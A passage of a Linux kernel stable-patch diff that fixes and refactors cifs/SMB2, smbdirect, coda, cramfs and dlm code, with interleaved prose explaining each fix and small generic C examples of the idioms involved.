++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -1453,12 +1459,12 @@ smb2_ioctl_query_info(const unsigned int xid,
+ 	rqst[0].rq_iov = &vars->open_iov[0];
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	if (qi.flags & PASSTHRU_FSCTL) {
+ 		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+@@ -2088,12 +2094,13 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	}
+ 
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+ 		       NULL);
+@@ -2159,12 +2166,13 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2490,12 +2498,13 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = desired_access;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2623,12 +2632,13 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!tcon->posix_extensions)
+ 		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -2916,13 +2926,13 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3056,13 +3066,13 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3196,17 +3206,20 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 		return ERR_PTR(rc);
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.disposition = FILE_OPEN;
+-	/*
+-	 * When querying an ACL, even if the file is a symlink we want to open
+-	 * the source not the target, and so the protocol requires that the
+-	 * client specify this flag when opening a reparse point
+-	 */
+-	oparms.create_options = cifs_create_options(cifs_sb, 0) | OPEN_REPARSE_POINT;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
+ 
+ 	if (info & SACL_SECINFO)
+ 		oparms.desired_access |= SYSTEM_SECURITY;
+@@ -3265,13 +3278,14 @@ set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 		return rc;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -5134,15 +5148,16 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 2c9ffa921e6f6..23926f754d2aa 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,6 +139,66 @@ out:
+ 	return;
+ }
+ 
++static int wait_for_server_reconnect(struct TCP_Server_Info *server,
++				     __le16 smb2_command, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Return to the caller for TREE_DISCONNECT, LOGOFF, and CLOSE
++	 * here since they are implicitly done when the session drops.
++	 */
++	switch (smb2_command) {
++	/*
++	 * BB Should we keep oplock break and add flush to exceptions?
++	 */
++	case SMB2_TREE_DISCONNECT:
++	case SMB2_CANCEL:
++	case SMB2_CLOSE:
++	case SMB2_OPLOCK_BREAK:
++		return -EAGAIN;
++	}
++
++	/*
++	 * Give the demultiplex thread up to 10 seconds per target available
++	 * for reconnect -- this should be greater than the cifs socket
++	 * timeout, which is 7 seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until the
++	 * process is killed or the server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
++
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+@@ -146,7 +206,6 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	int rc = 0;
+ 	struct nls_table *nls_codepage;
+ 	struct cifs_ses *ses;
+-	int retries;
+ 
+ 	/*
+ 	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
+@@ -184,61 +243,11 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	ses = tcon->ses;
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			return -EAGAIN;
+-		}
+-
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
++	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	if (rc)
++		return rc;
+ 
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	ses = tcon->ses;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -3898,7 +3907,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		goto done;
+ 
+ 	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = kzalloc(sizeof(struct cifs_tcon), GFP_KERNEL);
++	tcon = tconInfoAlloc();
+ 	if (!tcon) {
+ 		resched = true;
+ 		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+@@ -3921,7 +3930,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		list_del_init(&ses->rlist);
+ 		cifs_put_smb_ses(ses);
+ 	}
+-	kfree(tcon);
++	tconInfoFree(tcon);
+ 
+ done:
+ 	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+@@ -4054,6 +4063,36 @@ SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+ 	return rc;
+ }
+ 
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
+ /*
+  * To form a chain of read requests, any read requests after the first should
+  * have the end_of_chain boolean set to true.
+@@ -4097,9 +4136,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (server->rdma && rdata && !server->sign &&
+-		rdata->bytes >= server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4495,10 +4532,27 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	struct kvec iov[1];
+ 	struct smb_rqst rqst = { };
+ 	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+ 
++	/*
++	 * In the future we may get cifs_io_parms passed in from the caller;
++	 * for now we construct it here.
++	 */
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
+ 	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -4508,28 +4562,31 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 		flags |= CIFS_TRANSFORM_REQ;
+ 
+ 	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(wdata->cfile->pid);
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+ 
+-	req->PersistentFileId = wdata->cfile->fid.persistent_fid;
+-	req->VolatileFileId = wdata->cfile->fid.volatile_fid;
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
+ 	req->WriteChannelInfoOffset = 0;
+ 	req->WriteChannelInfoLength = 0;
+ 	req->Channel = 0;
+-	req->Offset = cpu_to_le64(wdata->offset);
++	req->Offset = cpu_to_le64(io_parms->offset);
+ 	req->DataOffset = cpu_to_le16(
+ 				offsetof(struct smb2_write_req, Buffer));
+ 	req->RemainingBytes = 0;
+ 
+-	trace_smb3_write_enter(0 /* xid */, wdata->cfile->fid.persistent_fid,
+-		tcon->tid, tcon->ses->Suid, wdata->offset, wdata->bytes);
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/*
+ 	 * If we want to do a server RDMA read, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of write request
+ 	 */
+-	if (server->rdma && !server->sign && wdata->bytes >=
+-		server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4581,14 +4638,14 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	}
+ #endif
+ 	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
++		 io_parms->offset, io_parms->length);
+ 
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+ 	if (!wdata->mr)
+-		req->Length = cpu_to_le32(wdata->bytes);
++		req->Length = cpu_to_le32(io_parms->length);
+ #else
+-	req->Length = cpu_to_le32(wdata->bytes);
++	req->Length = cpu_to_le32(io_parms->length);
+ #endif
+ 
+ 	if (wdata->credits.value > 0) {
+@@ -4596,7 +4653,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 						    SMB2_MAX_BUFFER_SIZE));
+ 		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+ 
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+ 			goto async_writev_out;
+ 
+@@ -4609,9 +4666,12 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 
+ 	if (rc) {
+ 		trace_smb3_write_err(0 /* no xid */,
+-				     req->PersistentFileId,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, rc);
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
+ 		kref_put(&wdata->refcount, release);
+ 		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+ 	}
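
Two consolidations in the smb2pdu.c diff above are worth calling out. First, the read
and write paths used to duplicate the "should this I/O be offloaded to RDMA?" test,
and the open-coded copies checked only server->rdma, server->sign and the size
threshold; smb3_use_rdma_offload() centralizes the test and adds the missing NULL and
encryption checks. Second, smb2_async_writev() now builds a local cifs_io_parms once
instead of reaching into wdata->cfile at every use. The refactoring shape of the
predicate, as a generic C sketch (hypothetical types, not the kernel's):

    #include <stdbool.h>
    #include <stddef.h>

    struct conn {
            bool rdma, sign, encrypt;
            size_t rdma_threshold;
    };

    /* one named predicate instead of a condition copied at each call site */
    static bool use_rdma_offload(const struct conn *c, size_t len)
    {
            if (!c || !c->rdma)
                    return false;
            if (c->sign || c->encrypt)      /* not supported yet */
                    return false;
            return len >= c->rdma_threshold;
    }
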
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 8c816b25ce7c6..cf923f211c512 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1700,6 +1700,7 @@ static struct smbd_connection *_smbd_get_connection(
+ 
+ allocate_mr_failed:
+ 	/* At this point, need to a full transport shutdown */
++	server->smbd_conn = info;
+ 	smbd_destroy(server);
+ 	return NULL;
+ 
+@@ -2217,6 +2218,7 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 	atomic_set(&info->mr_ready_count, 0);
+ 	atomic_set(&info->mr_used_count, 0);
+ 	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	/* Allocate more MRs (2x) than hardware responder_resources */
+ 	for (i = 0; i < info->responder_resources * 2; i++) {
+ 		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+@@ -2244,13 +2246,13 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+ 		atomic_inc(&info->mr_ready_count);
+ 	}
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	return 0;
+ 
+ out:
+ 	kfree(smbdirect_mr);
+ 
+ 	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
+ 		ib_dereg_mr(smbdirect_mr->mr);
+ 		kfree(smbdirect_mr->sgl);
+ 		kfree(smbdirect_mr);
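
Three ordering fixes in the smbdirect.c diff above: the failure path of
_smbd_get_connection() now points server->smbd_conn at the half-built connection
before calling smbd_destroy(), which expects to find it there; INIT_WORK() moves
ahead of the allocation loop so the MR recovery work item can never be queued before
it is initialized; and the error path unlinks each MR from info->mr_list before
freeing it, so later teardown walking the list cannot touch freed memory. The
unlink-before-free idiom in miniature (plain singly linked list, hypothetical types):

    #include <stdlib.h>

    struct node {
            struct node *next;
    };

    /* pop each node off the list before freeing it, so the list never
     * holds a pointer to memory that has already been released */
    static void destroy_list(struct node **head)
    {
            while (*head) {
                    struct node *n = *head;

                    *head = n->next;        /* unlink first ...     */
                    free(n);                /* ... then free safely */
            }
    }
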
+diff --git a/fs/coda/upcall.c b/fs/coda/upcall.c
+index 59f6cfd06f96a..cd6a3721f6f69 100644
+--- a/fs/coda/upcall.c
++++ b/fs/coda/upcall.c
+@@ -791,7 +791,7 @@ static int coda_upcall(struct venus_comm *vcp,
+ 	sig_req = kmalloc(sizeof(struct upc_req), GFP_KERNEL);
+ 	if (!sig_req) goto exit;
+ 
+-	sig_inputArgs = kvzalloc(sizeof(struct coda_in_hdr), GFP_KERNEL);
++	sig_inputArgs = kvzalloc(sizeof(*sig_inputArgs), GFP_KERNEL);
+ 	if (!sig_inputArgs) {
+ 		kfree(sig_req);
+ 		goto exit;
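
The coda change is the textbook case for the sizeof(*ptr) allocation idiom: the old
code sized the buffer from a type name (struct coda_in_hdr) smaller than the union
that sig_inputArgs actually points at, so later writes could land past the
allocation. Sizing from the dereferenced pointer keeps allocation and use in sync
even if the pointer's type changes. A tiny runnable sketch (hypothetical struct):

    #include <stdio.h>
    #include <stdlib.h>

    struct big {
            int hdr;
            int payload[16];
    };

    int main(void)
    {
            /* sized from the object the pointer refers to, not from a
             * type name that can silently go out of sync with it */
            struct big *p = calloc(1, sizeof(*p));

            if (!p)
                    return 1;
            printf("%zu bytes allocated\n", sizeof(*p));
            free(p);
            return 0;
    }
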
+diff --git a/fs/cramfs/inode.c b/fs/cramfs/inode.c
+index 61ccf7722fc3c..6dae27d6f553f 100644
+--- a/fs/cramfs/inode.c
++++ b/fs/cramfs/inode.c
+@@ -183,7 +183,7 @@ static void *cramfs_blkdev_read(struct super_block *sb, unsigned int offset,
+ 				unsigned int len)
+ {
+ 	struct address_space *mapping = sb->s_bdev->bd_inode->i_mapping;
+-	struct file_ra_state ra;
++	struct file_ra_state ra = {};
+ 	struct page *pages[BLKS_PER_BUF];
+ 	unsigned i, blocknr, buffer;
+ 	unsigned long devsize;
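
The cramfs hunk fixes an uninitialized stack structure: cramfs_blkdev_read() handed
the readahead code a file_ra_state full of whatever happened to be on the stack. The
empty-brace initializer zeroes every member (empty braces are a GNU extension the
kernel builds with; strict pre-C23 code would spell it "{ 0 }"). The idiom in
isolation (hypothetical struct):

    struct ra_state {
            unsigned long start;
            unsigned long size;
    };

    void setup(void)
    {
            struct ra_state ra = {};        /* all members zeroed */

            /* without the initializer, ra.start and ra.size would
             * hold indeterminate stack garbage */
            (void)ra;
    }
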
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index d0b4e2181a5f3..99bc96f907799 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -381,23 +381,23 @@ static int threads_start(void)
+ {
+ 	int error;
+ 
+-	error = dlm_scand_start();
++	/* Thread for sending/receiving messages for all lockspace's */
++	error = dlm_midcomms_start();
+ 	if (error) {
+-		log_print("cannot start dlm_scand thread %d", error);
++		log_print("cannot start dlm midcomms %d", error);
+ 		goto fail;
+ 	}
+ 
+-	/* Thread for sending/receiving messages for all lockspace's */
+-	error = dlm_midcomms_start();
++	error = dlm_scand_start();
+ 	if (error) {
+-		log_print("cannot start dlm midcomms %d", error);
+-		goto scand_fail;
++		log_print("cannot start dlm_scand thread %d", error);
++		goto midcomms_fail;
+ 	}
+ 
+ 	return 0;
+ 
+- scand_fail:
+-	dlm_scand_stop();
++ midcomms_fail:
++	dlm_midcomms_stop();
+  fail:
+ 	return error;
+ }
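
The dlm swap fixes an ordering dependency: the scand thread can send messages, so the
midcomms layer it depends on must be running first, and the unwind label is renamed
so that teardown remains the mirror image of startup. The general bring-up/unwind
shape (stub functions standing in for the real ones):

    static int start_comms(void)    { return 0; }   /* stubs for the sketch */
    static void stop_comms(void)    { }
    static int start_scanner(void)  { return 0; }

    int bring_up(void)
    {
            int err;

            err = start_comms();            /* dependency first      */
            if (err)
                    goto fail;

            err = start_scanner();          /* its consumer second   */
            if (err)
                    goto undo_comms;

            return 0;

    undo_comms:
            stop_comms();                   /* undo in reverse order */
    fail:
            return err;
    }
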
+diff --git a/fs/dlm/memory.c b/fs/dlm/memory.c
+index eb7a08641fcf5..cdbaa452fc05a 100644
+--- a/fs/dlm/memory.c
++++ b/fs/dlm/memory.c
+@@ -51,7 +51,7 @@ int __init dlm_memory_init(void)
+ 	cb_cache = kmem_cache_create("dlm_cb", sizeof(struct dlm_callback),
+ 				     __alignof__(struct dlm_callback), 0,
+ 				     NULL);
+-	if (!rsb_cache)
++	if (!cb_cache)
+ 		goto cb;
+ 
+ 	return 0;
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index fc015a6abe178..ecfb3beb0bb88 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -375,7 +375,7 @@ static int dlm_send_ack(int nodeid, uint32_t seq)
+ 	struct dlm_msg *msg;
+ 	char *ppc;
+ 
+-	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_NOFS, &ppc,
++	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_ATOMIC, &ppc,
+ 				   NULL, NULL);
+ 	if (!msg)
+ 		return -ENOMEM;
+@@ -402,10 +402,11 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	struct dlm_mhandle *mh;
+ 	char *ppc;
+ 
+-	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_NOFS, &ppc);
++	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_ATOMIC, &ppc);
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
++	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 	mh->ack_rcv = ack_rcv;
+ 
+ 	m_header = (struct dlm_header *)ppc;
+@@ -417,7 +418,6 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 
+ 	pr_debug("sending fin msg to node %d\n", node->nodeid);
+ 	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+-	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 
+ 	return 0;
+ }
+@@ -498,15 +498,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 
+ 		switch (p->header.h_cmd) {
+ 		case DLM_FIN:
+-			/* send ack before fin */
+-			dlm_send_ack(node->nodeid, node->seq_next);
+-
+ 			spin_lock(&node->state_lock);
+ 			pr_debug("receive fin msg from node %d with state %s\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+ 
+ 			switch (node->state) {
+ 			case DLM_ESTABLISHED:
++				dlm_send_ack(node->nodeid, node->seq_next);
++
+ 				node->state = DLM_CLOSE_WAIT;
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -518,16 +517,19 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					node->state = DLM_LAST_ACK;
